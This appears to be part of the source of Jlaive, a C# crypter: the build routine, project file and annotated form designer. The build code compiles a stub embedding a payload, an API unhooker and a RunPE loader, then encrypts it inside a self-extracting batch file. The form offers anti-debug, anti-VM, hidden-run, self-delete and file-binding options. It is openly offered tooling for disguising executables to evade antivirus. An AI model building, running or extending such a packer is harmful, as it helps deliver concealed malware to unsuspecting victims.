"System.dll", "System.Management.dll" }, tempfile) 156 | { 157 | GenerateExecutable = true, 158 | CompilerOptions = "/optimize", 159 | IncludeDebugInformation = false 160 | }; 161 | parameters.EmbeddedResources.Add("payload.exe"); 162 | parameters.EmbeddedResources.Add("apiunhooker.dll"); 163 | if (!isnetasm) parameters.EmbeddedResources.Add("runpe.dll"); 164 | foreach (string item in listBox1.Items) parameters.EmbeddedResources.Add(item); 165 | CompilerResults results = csc.CompileAssemblyFromSource(parameters, stub); 166 | if (results.Errors.Count > 0) 167 | { 168 | File.Delete("payload.txt"); 169 | if (!isnetasm) File.Delete("runpe.dll"); 170 | File.Delete(tempfile); 171 | List errors = new List(); 172 | foreach (CompilerError error in results.Errors) errors.Add(error.ToString()); 173 | MessageBox.Show($"Stub build errors:{Environment.NewLine}{string.Join(Environment.NewLine, errors)}", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error); 174 | buildButton.Enabled = true; 175 | return; 176 | } 177 | byte[] stubbytes = File.ReadAllBytes(tempfile); 178 | File.Delete("payload.exe"); 179 | File.Delete("apiunhooker.dll"); 180 | if (!isnetasm) File.Delete("runpe.dll"); 181 | File.Delete(tempfile); 182 | /* Outer layer: the compiled stub is compressed, encrypted with key1/iv1 and appended as Base64 after the generated batch text, so the final artefact is a single text file. */ 183 | listBox2.Items.Add("Encrypting stub..."); 184 | byte[] stub_enc = Encrypt(mode, Compress(stubbytes), _key, _iv); 185 | 186 | listBox2.Items.Add("Creating batch file..."); 187 | string content = FileGen.CreateBat(_key, _iv, mode, hidden.Checked, selfDelete.Checked, rng); 188 | content += Convert.ToBase64String(stub_enc); 189 | 190 | listBox2.Items.Add("Writing output..."); 191 | File.WriteAllText(Path.ChangeExtension(_input, "bat"), content, Encoding.ASCII); 192 | 193 | MessageBox.Show("Done!", "Success", MessageBoxButtons.OK, MessageBoxIcon.Information); 194 | buildButton.Enabled = true; 195 | } 196 | /* Downloads the version string from the project's raw GitHub URL, compares it with the value stored in bin\latestversion under the application base directory, offers to open the matching release page when they differ, and then stores the downloaded value. Every exception is swallowed, so a failed check is silent. The builder therefore makes one outbound HTTPS request at start-up. */ 197 | private void CheckVersion() 198 | { 199 | try 200 | { 201 | WebClient wc = new WebClient(); 202 | string latestversion =
wc.DownloadString("https://raw.githubusercontent.com/ch2sh/Jlaive/main/version").Trim(); 203 | wc.Dispose(); 204 | if (File.Exists(AppDomain.CurrentDomain.BaseDirectory + "\\bin\\latestversion")) 205 | { 206 | string currentversion = File.ReadAllText(AppDomain.CurrentDomain.BaseDirectory + "\\bin\\latestversion").Trim(); 207 | if (currentversion != latestversion) 208 | { 209 | DialogResult result = MessageBox.Show($"Jlaive {currentversion} is outdated. Download {latestversion}?", "Warning", MessageBoxButtons.YesNoCancel, MessageBoxIcon.Exclamation); 210 | if (result == DialogResult.Yes) 211 | { 212 | Process.Start("https://github.com/ch2sh/Jlaive/releases/tag/" + latestversion); 213 | } 214 | } 215 | } 216 | File.WriteAllText(AppDomain.CurrentDomain.BaseDirectory + "\\bin\\latestversion", latestversion); 217 | } 218 | catch { } 219 | } 220 | /* Fills the key/IV boxes from two fresh AesManaged instances, Base64-encoded: key1/iv1 are read by Crypt as the outer (batch) layer key, key2/iv6 as the stub layer key. */ 221 | private void UpdateKeys(object sender, EventArgs e) 222 | { 223 | AesManaged aes = new AesManaged(); 224 | key1.Text = Convert.ToBase64String(aes.Key); 225 | iv1.Text = Convert.ToBase64String(aes.IV); 226 | aes.Dispose(); 227 | aes = new AesManaged(); 228 | key2.Text = Convert.ToBase64String(aes.Key); 229 | iv6.Text = Convert.ToBase64String(aes.IV); 230 | aes.Dispose(); 231 | } 232 | } 233 | } -------------------------------------------------------------------------------- /Jlaive/Jlaive.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Debug 7 | AnyCPU 8 | {D6BBA820-E9F7-4DA3-A7D2-90A73871C0DA} 9 | WinExe 10 | Jlaive 11 | Jlaive 12 | v4.8 13 | 512 14 | true 15 | true 16 | 17 | 18 | 19 | 20 | AnyCPU 21 | true 22 | full 23 | false 24 | bin\Debug\ 25 | DEBUG;TRACE 26 | prompt 27 | 4 28 | 29 | 30 | AnyCPU 31 | none 32 | true 33 | bin\Release\ 34 | TRACE 35 | prompt 36 | 4 37 | 38 | 39 | 40 | ..\packages\Costura.Fody.5.7.0\lib\netstandard1.0\Costura.dll 41 | 42 | 43 | ..\packages\dnlib.3.5.0\lib\net45\dnlib.dll 44 | 45 | 46 |
..\packages\Microsoft.Win32.Primitives.4.3.0\lib\net46\Microsoft.Win32.Primitives.dll 47 | True 48 | True 49 | 50 | 51 | ..\packages\Newtonsoft.Json.13.0.1\lib\net45\Newtonsoft.Json.dll 52 | 53 | 54 | 55 | ..\packages\System.AppContext.4.3.0\lib\net463\System.AppContext.dll 56 | True 57 | True 58 | 59 | 60 | 61 | ..\packages\System.Console.4.3.0\lib\net46\System.Console.dll 62 | True 63 | True 64 | 65 | 66 | 67 | ..\packages\System.Diagnostics.DiagnosticSource.4.3.0\lib\net46\System.Diagnostics.DiagnosticSource.dll 68 | 69 | 70 | ..\packages\System.Diagnostics.Tracing.4.3.0\lib\net462\System.Diagnostics.Tracing.dll 71 | True 72 | True 73 | 74 | 75 | ..\packages\System.Globalization.Calendars.4.3.0\lib\net46\System.Globalization.Calendars.dll 76 | True 77 | True 78 | 79 | 80 | ..\packages\System.IO.4.3.0\lib\net462\System.IO.dll 81 | True 82 | True 83 | 84 | 85 | ..\packages\System.IO.Compression.4.3.0\lib\net46\System.IO.Compression.dll 86 | True 87 | True 88 | 89 | 90 | 91 | ..\packages\System.IO.Compression.ZipFile.4.3.0\lib\net46\System.IO.Compression.ZipFile.dll 92 | True 93 | True 94 | 95 | 96 | ..\packages\System.IO.FileSystem.4.3.0\lib\net46\System.IO.FileSystem.dll 97 | True 98 | True 99 | 100 | 101 | ..\packages\System.IO.FileSystem.Primitives.4.3.0\lib\net46\System.IO.FileSystem.Primitives.dll 102 | True 103 | True 104 | 105 | 106 | ..\packages\System.Linq.4.3.0\lib\net463\System.Linq.dll 107 | True 108 | True 109 | 110 | 111 | ..\packages\System.Linq.Expressions.4.3.0\lib\net463\System.Linq.Expressions.dll 112 | True 113 | True 114 | 115 | 116 | ..\packages\System.Net.Http.4.3.0\lib\net46\System.Net.Http.dll 117 | True 118 | True 119 | 120 | 121 | ..\packages\System.Net.Sockets.4.3.0\lib\net46\System.Net.Sockets.dll 122 | True 123 | True 124 | 125 | 126 | 127 | ..\packages\System.Reflection.4.3.0\lib\net462\System.Reflection.dll 128 | True 129 | True 130 | 131 | 132 | ..\packages\System.Runtime.4.3.0\lib\net462\System.Runtime.dll 133 | True 134 | True 
135 | 136 | 137 | ..\packages\System.Runtime.Extensions.4.3.0\lib\net462\System.Runtime.Extensions.dll 138 | True 139 | True 140 | 141 | 142 | ..\packages\System.Runtime.InteropServices.4.3.0\lib\net463\System.Runtime.InteropServices.dll 143 | True 144 | True 145 | 146 | 147 | ..\packages\System.Runtime.InteropServices.RuntimeInformation.4.3.0\lib\net45\System.Runtime.InteropServices.RuntimeInformation.dll 148 | True 149 | True 150 | 151 | 152 | ..\packages\System.Security.Cryptography.Algorithms.4.3.0\lib\net463\System.Security.Cryptography.Algorithms.dll 153 | True 154 | True 155 | 156 | 157 | ..\packages\System.Security.Cryptography.Encoding.4.3.0\lib\net46\System.Security.Cryptography.Encoding.dll 158 | True 159 | True 160 | 161 | 162 | ..\packages\System.Security.Cryptography.Primitives.4.3.0\lib\net46\System.Security.Cryptography.Primitives.dll 163 | True 164 | True 165 | 166 | 167 | ..\packages\System.Security.Cryptography.X509Certificates.4.3.0\lib\net461\System.Security.Cryptography.X509Certificates.dll 168 | True 169 | True 170 | 171 | 172 | ..\packages\System.Text.RegularExpressions.4.3.0\lib\net463\System.Text.RegularExpressions.dll 173 | True 174 | True 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | ..\packages\System.Xml.ReaderWriter.4.3.0\lib\net46\System.Xml.ReaderWriter.dll 186 | True 187 | True 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | Form 197 | 198 | 199 | Form1.cs 200 | 201 | 202 | 203 | 204 | 205 | 206 | Form1.cs 207 | 208 | 209 | 210 | ResXFileCodeGenerator 211 | Resources.Designer.cs 212 | Designer 213 | 214 | 215 | True 216 | Resources.resx 217 | 218 | 219 | 220 | SettingsSingleFileGenerator 221 | Settings.Designer.cs 222 | 223 | 224 | True 225 | Settings.settings 226 | True 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 | 235 | 236 | 237 | 238 | 239 | 240 | 241 | 242 | 243 | 244 | This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. 
For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}. 245 | 246 | 247 | 248 | 249 | 250 | 251 | -------------------------------------------------------------------------------- /Jlaive/Form1.Designer.cs: -------------------------------------------------------------------------------- 1 | namespace Jlaive 2 | { 3 | partial class Form1 4 | { 5 | /// 6 | /// Required designer variable. 7 | /// 8 | private System.ComponentModel.IContainer components = null; 9 | 10 | /// 11 | /// Clean up any resources being used. 12 | /// 13 | /// true if managed resources should be disposed; otherwise, false. 14 | protected override void Dispose(bool disposing) 15 | { 16 | if (disposing && (components != null)) 17 | { 18 | components.Dispose(); 19 | } 20 | base.Dispose(disposing); 21 | } 22 | 23 | #region Windows Form Designer generated code 24 | 25 | /// 26 | /// Required method for Designer support - do not modify 27 | /// the contents of this method with the code editor. 
///
        private void InitializeComponent()
        {
            // Designer-generated construction of the builder's single window.
            // The method (1) instantiates every control, (2) suspends layout on the
            // containers, (3) sets each control's properties and event hooks,
            // (4) parents the controls into their tab pages / the form, and
            // (5) resumes layout. Nothing here performs any build, encryption or
            // file handling: the event handlers it subscribes (openButton_Click,
            // buildButton_Click, UpdateKeys, xorEncryption_CheckedChanged,
            // aesEncryption_CheckedChanged, addFile_Click, removeFile_Click,
            // Form1_FormClosing, Form1_Load) are defined outside this listing.
            //
            // NOTE(review): for anyone triaging this project, the control captions
            // below ("Anti Debug", "Anti VM", "Self delete", "Hidden", "AES", "XOR",
            // "Binder") are a compact inventory of the options the builder exposes.
            // What each option does to the generated output is decided in the
            // handlers and code-generation files, not in this file - confirm there.

            // --- 1. Control instantiation (no properties set yet) ---
            this.label1 = new System.Windows.Forms.Label();
            this.textBox1 = new System.Windows.Forms.TextBox();
            this.openButton = new System.Windows.Forms.Button();
            this.antiDebug = new System.Windows.Forms.CheckBox();
            this.buildButton = new System.Windows.Forms.Button();
            this.selfDelete = new System.Windows.Forms.CheckBox();
            this.hidden = new System.Windows.Forms.CheckBox();
            this.antiVM = new System.Windows.Forms.CheckBox();
            this.tabControl1 = new System.Windows.Forms.TabControl();
            this.optionsPage = new System.Windows.Forms.TabPage();
            this.encryptionPage = new System.Windows.Forms.TabPage();
            this.refreshKeys = new System.Windows.Forms.Button();
            this.iv6 = new System.Windows.Forms.TextBox();
            this.iv1 = new System.Windows.Forms.TextBox();
            this.key2 = new System.Windows.Forms.TextBox();
            this.label3 = new System.Windows.Forms.Label();
            this.key1 = new System.Windows.Forms.TextBox();
            this.label2 = new System.Windows.Forms.Label();
            this.xorEncryption = new System.Windows.Forms.CheckBox();
            this.aesEncryption = new System.Windows.Forms.CheckBox();
            this.binderPage = new System.Windows.Forms.TabPage();
            this.removeFile = new System.Windows.Forms.Button();
            this.addFile = new System.Windows.Forms.Button();
            this.listBox1 = new System.Windows.Forms.ListBox();
            this.outputPage = new System.Windows.Forms.TabPage();
            this.listBox2 = new System.Windows.Forms.ListBox();

            // --- 2. Suspend layout on every container while properties are assigned;
            //        each SuspendLayout is paired with a ResumeLayout at the end. ---
            this.tabControl1.SuspendLayout();
            this.optionsPage.SuspendLayout();
            this.encryptionPage.SuspendLayout();
            this.binderPage.SuspendLayout();
            this.outputPage.SuspendLayout();
            this.SuspendLayout();
            //
            // label1 - static caption "File path:" placed above textBox1
            //
            this.label1.AutoSize = true;
            this.label1.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.label1.Location = new System.Drawing.Point(9, 14);
            this.label1.Margin = new System.Windows.Forms.Padding(2, 0, 2, 0);
            this.label1.Name = "label1";
            this.label1.Size = new System.Drawing.Size(67, 18);
            this.label1.TabIndex = 0;
            this.label1.Text = "File path:";
            //
            // textBox1 - editable text box under the "File path:" caption
            // (not marked ReadOnly, so its content can be typed as well as set by code)
            //
            this.textBox1.Location = new System.Drawing.Point(12, 35);
            this.textBox1.Margin = new System.Windows.Forms.Padding(2);
            this.textBox1.Name = "textBox1";
            this.textBox1.Size = new System.Drawing.Size(469, 22);
            this.textBox1.TabIndex = 1;
            //
            // openButton - "..." button to the right of textBox1; Click -> openButton_Click
            // (presumably opens a file picker - handler not visible here, confirm)
            //
            this.openButton.Anchor = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Right)));
            this.openButton.Location = new System.Drawing.Point(485, 34);
            this.openButton.Margin = new System.Windows.Forms.Padding(2);
            this.openButton.Name = "openButton";
            this.openButton.Size = new System.Drawing.Size(75, 25);
            this.openButton.TabIndex = 2;
            this.openButton.Text = "...";
            this.openButton.UseVisualStyleBackColor = true;
            this.openButton.Click += new System.EventHandler(this.openButton_Click);
            //
            // antiDebug - option checkbox captioned "Anti Debug" (Options tab).
            // Only the UI state is created here; where it is read is not visible.
            //
            this.antiDebug.AutoSize = true;
            this.antiDebug.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.antiDebug.Location = new System.Drawing.Point(4, 4);
            this.antiDebug.Margin = new System.Windows.Forms.Padding(2);
            this.antiDebug.Name = "antiDebug";
            this.antiDebug.Size = new System.Drawing.Size(101, 22);
            this.antiDebug.TabIndex = 6;
            this.antiDebug.Text = "Anti Debug";
            this.antiDebug.UseVisualStyleBackColor = true;
            //
            // buildButton - wide "Build" button below the tab control; Click -> buildButton_Click
            //
            this.buildButton.Location = new System.Drawing.Point(11, 359);
            this.buildButton.Margin = new System.Windows.Forms.Padding(2);
            this.buildButton.Name = "buildButton";
            this.buildButton.Size = new System.Drawing.Size(550, 48);
            this.buildButton.TabIndex = 7;
            this.buildButton.Text = "Build";
            this.buildButton.UseVisualStyleBackColor = true;
            this.buildButton.Click += new System.EventHandler(this.buildButton_Click);
            //
            // selfDelete - option checkbox captioned "Self delete" (Options tab)
            //
            this.selfDelete.AutoSize = true;
            this.selfDelete.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.selfDelete.Location = new System.Drawing.Point(4, 56);
            this.selfDelete.Margin = new System.Windows.Forms.Padding(2);
            this.selfDelete.Name = "selfDelete";
            this.selfDelete.Size = new System.Drawing.Size(98, 22);
            this.selfDelete.TabIndex = 8;
            this.selfDelete.Text = "Self delete";
            this.selfDelete.UseVisualStyleBackColor = true;
            //
            // hidden - option checkbox captioned "Hidden" (Options tab)
            //
            this.hidden.AutoSize = true;
            this.hidden.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.hidden.Location = new System.Drawing.Point(4, 82);
            this.hidden.Margin = new System.Windows.Forms.Padding(2);
            this.hidden.Name = "hidden";
            this.hidden.Size = new System.Drawing.Size(76, 22);
            this.hidden.TabIndex = 9;
            this.hidden.Text = "Hidden";
            this.hidden.UseVisualStyleBackColor = true;
            //
            // antiVM - option checkbox captioned "Anti VM" (Options tab)
            //
            this.antiVM.AutoSize = true;
            this.antiVM.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.antiVM.Location = new System.Drawing.Point(4, 30);
            this.antiVM.Margin = new System.Windows.Forms.Padding(2);
            this.antiVM.Name = "antiVM";
            this.antiVM.Size = new System.Drawing.Size(80, 22);
            this.antiVM.TabIndex = 10;
            this.antiVM.Text = "Anti VM";
            this.antiVM.UseVisualStyleBackColor = true;
            //
            // tabControl1 - hosts the four pages in this order:
            // Options, Encryption, Binder, Output; the first page is selected initially
            //
            this.tabControl1.Controls.Add(this.optionsPage);
            this.tabControl1.Controls.Add(this.encryptionPage);
            this.tabControl1.Controls.Add(this.binderPage);
            this.tabControl1.Controls.Add(this.outputPage);
            this.tabControl1.Font = new System.Drawing.Font("Microsoft Sans Serif", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.tabControl1.Location = new System.Drawing.Point(12, 65);
            this.tabControl1.Margin = new System.Windows.Forms.Padding(2);
            this.tabControl1.Name = "tabControl1";
            this.tabControl1.SelectedIndex = 0;
            this.tabControl1.Size = new System.Drawing.Size(548, 290);
            this.tabControl1.TabIndex = 11;
            //
            // optionsPage - "Options" tab; holds the four option checkboxes
            //
            this.optionsPage.Controls.Add(this.hidden);
            this.optionsPage.Controls.Add(this.selfDelete);
            this.optionsPage.Controls.Add(this.antiDebug);
            this.optionsPage.Controls.Add(this.antiVM);
            this.optionsPage.Location = new System.Drawing.Point(4, 26);
            this.optionsPage.Margin = new System.Windows.Forms.Padding(2);
            this.optionsPage.Name = "optionsPage";
            this.optionsPage.Padding = new System.Windows.Forms.Padding(2);
            this.optionsPage.Size = new System.Drawing.Size(540, 260);
            this.optionsPage.TabIndex = 0;
            this.optionsPage.Text = "Options";
            this.optionsPage.UseVisualStyleBackColor = true;
            //
            // encryptionPage - "Encryption" tab; holds the AES/XOR selectors, the
            // key and IV display boxes with their captions, and the refresh button
            //
            this.encryptionPage.Controls.Add(this.refreshKeys);
            this.encryptionPage.Controls.Add(this.iv6);
            this.encryptionPage.Controls.Add(this.iv1);
            this.encryptionPage.Controls.Add(this.key2);
            this.encryptionPage.Controls.Add(this.label3);
            this.encryptionPage.Controls.Add(this.key1);
            this.encryptionPage.Controls.Add(this.label2);
            this.encryptionPage.Controls.Add(this.xorEncryption);
            this.encryptionPage.Controls.Add(this.aesEncryption);
            this.encryptionPage.Location = new System.Drawing.Point(4, 26);
            this.encryptionPage.Margin = new System.Windows.Forms.Padding(2);
            this.encryptionPage.Name = "encryptionPage";
            this.encryptionPage.Padding = new System.Windows.Forms.Padding(2);
            this.encryptionPage.Size = new System.Drawing.Size(540, 260);
            this.encryptionPage.TabIndex = 1;
            this.encryptionPage.Text = "Encryption";
            this.encryptionPage.UseVisualStyleBackColor = true;
            //
            // refreshKeys - "Refresh keys" button; Click -> UpdateKeys
            // (presumably regenerates the values shown in key1/key2/iv1/iv6 - confirm
            // against the handler, which is not part of this listing)
            //
            this.refreshKeys.Location = new System.Drawing.Point(164, 194);
            this.refreshKeys.Margin = new System.Windows.Forms.Padding(2);
            this.refreshKeys.Name = "refreshKeys";
            this.refreshKeys.Size = new System.Drawing.Size(114, 25);
            this.refreshKeys.TabIndex = 9;
            this.refreshKeys.Text = "Refresh keys";
            this.refreshKeys.UseVisualStyleBackColor = true;
            this.refreshKeys.Click += new System.EventHandler(this.UpdateKeys);
            //
            // iv6 - second of the two read-only boxes beside the "IVs:" caption.
            // ReadOnly blocks typing only; the text can still be set from code.
            //
            this.iv6.Location = new System.Drawing.Point(52, 156);
            this.iv6.Margin = new System.Windows.Forms.Padding(2);
            this.iv6.Name = "iv6";
            this.iv6.ReadOnly = true;
            this.iv6.Size = new System.Drawing.Size(226, 23);
            this.iv6.TabIndex = 8;
            //
            // iv1 - first read-only box beside the "IVs:" caption
            //
            this.iv1.Location = new System.Drawing.Point(52, 128);
            this.iv1.Margin = new System.Windows.Forms.Padding(2);
            this.iv1.Name = "iv1";
            this.iv1.ReadOnly = true;
            this.iv1.Size = new System.Drawing.Size(226, 23);
            this.iv1.TabIndex = 7;
            //
            // key2 - second read-only box beside the "Keys:" caption
            //
            this.key2.Location = new System.Drawing.Point(52, 96);
            this.key2.Margin = new System.Windows.Forms.Padding(2);
            this.key2.Name = "key2";
            this.key2.ReadOnly = true;
            this.key2.Size = new System.Drawing.Size(226, 23);
            this.key2.TabIndex = 6;
            //
            // label3 - static caption "IVs:"
            //
            this.label3.AutoSize = true;
            this.label3.Location = new System.Drawing.Point(18, 131);
            this.label3.Margin = new System.Windows.Forms.Padding(2, 0, 2, 0);
            this.label3.Name = "label3";
            this.label3.Size = new System.Drawing.Size(31, 17);
            this.label3.TabIndex = 5;
            this.label3.Text = "IVs:";
            //
            // key1 - first read-only box beside the "Keys:" caption
            //
            this.key1.Location = new System.Drawing.Point(52, 71);
            this.key1.Margin = new System.Windows.Forms.Padding(2);
            this.key1.Name = "key1";
            this.key1.ReadOnly = true;
            this.key1.Size = new System.Drawing.Size(226, 23);
            this.key1.TabIndex = 3;
            //
            // label2 - static caption "Keys:"
            //
            this.label2.AutoSize = true;
            this.label2.Location = new System.Drawing.Point(6, 71);
            this.label2.Margin = new System.Windows.Forms.Padding(2, 0, 2, 0);
            this.label2.Name = "label2";
            this.label2.Size = new System.Drawing.Size(43, 17);
            this.label2.TabIndex = 2;
            this.label2.Text = "Keys:";
            //
            // xorEncryption - checkbox captioned "XOR"; CheckedChanged -> xorEncryption_CheckedChanged.
            // AES and XOR are two independent CheckBox controls, so any mutual
            // exclusion must come from the two CheckedChanged handlers (not visible here).
            //
            this.xorEncryption.AutoSize = true;
            this.xorEncryption.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.xorEncryption.Location = new System.Drawing.Point(4, 30);
            this.xorEncryption.Margin = new System.Windows.Forms.Padding(2);
            this.xorEncryption.Name = "xorEncryption";
            this.xorEncryption.Size = new System.Drawing.Size(63, 22);
            this.xorEncryption.TabIndex = 1;
            this.xorEncryption.Text = "XOR";
            this.xorEncryption.UseVisualStyleBackColor = true;
            this.xorEncryption.CheckedChanged += new System.EventHandler(this.xorEncryption_CheckedChanged);
            //
            // aesEncryption - checkbox captioned "AES"; pre-selected (Checked = true),
            // so AES is the mode shown as active when the form first appears.
            // CheckedChanged -> aesEncryption_CheckedChanged.
            //
            this.aesEncryption.AutoSize = true;
            this.aesEncryption.Checked = true;
            this.aesEncryption.CheckState = System.Windows.Forms.CheckState.Checked;
            this.aesEncryption.Font = new System.Drawing.Font("Microsoft Sans Serif", 9F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.aesEncryption.Location = new System.Drawing.Point(4, 4);
            this.aesEncryption.Margin = new System.Windows.Forms.Padding(2);
            this.aesEncryption.Name = "aesEncryption";
            this.aesEncryption.Size = new System.Drawing.Size(59, 22);
            this.aesEncryption.TabIndex = 0;
            this.aesEncryption.Text = "AES";
            this.aesEncryption.UseVisualStyleBackColor = true;
            this.aesEncryption.CheckedChanged += new System.EventHandler(this.aesEncryption_CheckedChanged);
            //
            // binderPage - "Binder" tab; a list box plus "Add file" / "Remove file" buttons
            //
            this.binderPage.Controls.Add(this.removeFile);
            this.binderPage.Controls.Add(this.addFile);
            this.binderPage.Controls.Add(this.listBox1);
            this.binderPage.Location = new System.Drawing.Point(4, 26);
            this.binderPage.Margin = new System.Windows.Forms.Padding(2);
            this.binderPage.Name = "binderPage";
            this.binderPage.Padding = new System.Windows.Forms.Padding(2);
            this.binderPage.Size = new System.Drawing.Size(540, 260);
            this.binderPage.TabIndex = 2;
            this.binderPage.Text = "Binder";
            this.binderPage.UseVisualStyleBackColor = true;
            //
            // removeFile - "Remove file" button; Click -> removeFile_Click
            //
            this.removeFile.Location = new System.Drawing.Point(122, 221);
            this.removeFile.Margin = new System.Windows.Forms.Padding(2);
            this.removeFile.Name = "removeFile";
            this.removeFile.Size = new System.Drawing.Size(116, 34);
            this.removeFile.TabIndex = 2;
            this.removeFile.Text = "Remove file";
            this.removeFile.UseVisualStyleBackColor = true;
            this.removeFile.Click += new System.EventHandler(this.removeFile_Click);
            //
            // addFile - "Add file" button; Click -> addFile_Click
            //
            this.addFile.Location = new System.Drawing.Point(2, 221);
            this.addFile.Margin = new System.Windows.Forms.Padding(2);
            this.addFile.Name = "addFile";
            this.addFile.Size = new System.Drawing.Size(116, 34);
            this.addFile.TabIndex = 1;
            this.addFile.Text = "Add file";
            this.addFile.UseVisualStyleBackColor = true;
            this.addFile.Click += new System.EventHandler(this.addFile_Click);
            //
            // listBox1 - list box on the Binder tab
            // (presumably the files added via addFile - populated elsewhere, confirm)
            //
            this.listBox1.FormattingEnabled = true;
            this.listBox1.ItemHeight = 17;
            this.listBox1.Location = new System.Drawing.Point(2, 5);
            this.listBox1.Margin = new System.Windows.Forms.Padding(2);
            this.listBox1.Name = "listBox1";
            this.listBox1.Size = new System.Drawing.Size(532, 208);
            this.listBox1.TabIndex = 0;
            //
            // outputPage - "Output" tab; contains only listBox2
            //
            this.outputPage.Controls.Add(this.listBox2);
            this.outputPage.Location = new System.Drawing.Point(4, 26);
            this.outputPage.Margin = new System.Windows.Forms.Padding(2);
            this.outputPage.Name = "outputPage";
            this.outputPage.Padding = new System.Windows.Forms.Padding(2);
            this.outputPage.Size = new System.Drawing.Size(540, 260);
            this.outputPage.TabIndex = 3;
            this.outputPage.Text = "Output";
            this.outputPage.UseVisualStyleBackColor = true;
            //
            // listBox2 - list box on the Output tab
            // (presumably receives build log lines - written elsewhere, confirm)
            //
            this.listBox2.FormattingEnabled = true;
            this.listBox2.ItemHeight = 17;
            this.listBox2.Location = new System.Drawing.Point(4, 4);
            this.listBox2.Margin = new System.Windows.Forms.Padding(2);
            this.listBox2.Name = "listBox2";
            this.listBox2.Size = new System.Drawing.Size(532, 242);
            this.listBox2.TabIndex = 4;
            //
            // Form1 - the window itself: DPI auto-scaling, fixed single border,
            // maximize box disabled, no icon, centred on screen, title "Jlaive".
            // FormClosing -> Form1_FormClosing, Load -> Form1_Load.
            //
            this.AutoScaleDimensions = new System.Drawing.SizeF(120F, 120F);
            this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Dpi;
            this.ClientSize = new System.Drawing.Size(571, 418);
            this.Controls.Add(this.tabControl1);
            this.Controls.Add(this.buildButton);
            this.Controls.Add(this.openButton);
            this.Controls.Add(this.textBox1);
            this.Controls.Add(this.label1);
            this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedSingle;
            this.Margin = new System.Windows.Forms.Padding(2);
            this.MaximizeBox = false;
            this.Name = "Form1";
            this.ShowIcon = false;
            this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
            this.Text = "Jlaive";
            this.FormClosing += new System.Windows.Forms.FormClosingEventHandler(this.Form1_FormClosing);
            this.Load += new System.EventHandler(this.Form1_Load);
            // Resume layout on every container suspended at the top of the method.
            // PerformLayout is called on the containers whose children include
            // AutoSize controls (Options and Encryption pages, and the form).
            this.tabControl1.ResumeLayout(false);
            this.optionsPage.ResumeLayout(false);
            this.optionsPage.PerformLayout();
            this.encryptionPage.ResumeLayout(false);
            this.encryptionPage.PerformLayout();
            this.binderPage.ResumeLayout(false);
            this.outputPage.ResumeLayout(false);
            this.ResumeLayout(false);
            this.PerformLayout();

        }

        #endregion

        // Control fields assigned in InitializeComponent. They are private, so the
        // rest of the form's logic reaches them only from within this class.
        private System.Windows.Forms.Label label1;               // "File path:" caption
        private System.Windows.Forms.TextBox textBox1;           // path text box
        private System.Windows.Forms.Button openButton;          // "..." button
        private System.Windows.Forms.CheckBox antiDebug;         // "Anti Debug" option
        private System.Windows.Forms.Button buildButton;         // "Build" button
        private System.Windows.Forms.CheckBox selfDelete;        // "Self delete" option
        private System.Windows.Forms.CheckBox hidden;            // "Hidden" option
        private System.Windows.Forms.CheckBox antiVM;            // "Anti VM" option
        private System.Windows.Forms.TabControl tabControl1;     // host of the four tabs
        private System.Windows.Forms.TabPage optionsPage;        // "Options" tab
        private System.Windows.Forms.TabPage encryptionPage;     // "Encryption" tab
        private System.Windows.Forms.CheckBox aesEncryption;     // "AES" selector (checked initially)
        private System.Windows.Forms.CheckBox xorEncryption;     // "XOR" selector
        private System.Windows.Forms.TabPage binderPage;         // "Binder" tab
        private System.Windows.Forms.TabPage outputPage;         // "Output" tab
        private System.Windows.Forms.Label label2;               // "Keys:" caption
        private System.Windows.Forms.TextBox key1;               // read-only key box 1
        private System.Windows.Forms.Label label3;               // "IVs:" caption
        private System.Windows.Forms.Button addFile;             // "Add file" button
        private System.Windows.Forms.ListBox listBox1;           // Binder tab list
        private System.Windows.Forms.TextBox iv6;                // read-only IV box 2
        private System.Windows.Forms.TextBox iv1;                // read-only IV box 1
        private System.Windows.Forms.TextBox key2;               // read-only key box 2
        private System.Windows.Forms.Button refreshKeys;         // "Refresh keys" button
        private System.Windows.Forms.Button removeFile;          // "Remove file" button
        private System.Windows.Forms.ListBox listBox2;           // Output tab list
    }
}

--------------------------------------------------------------------------------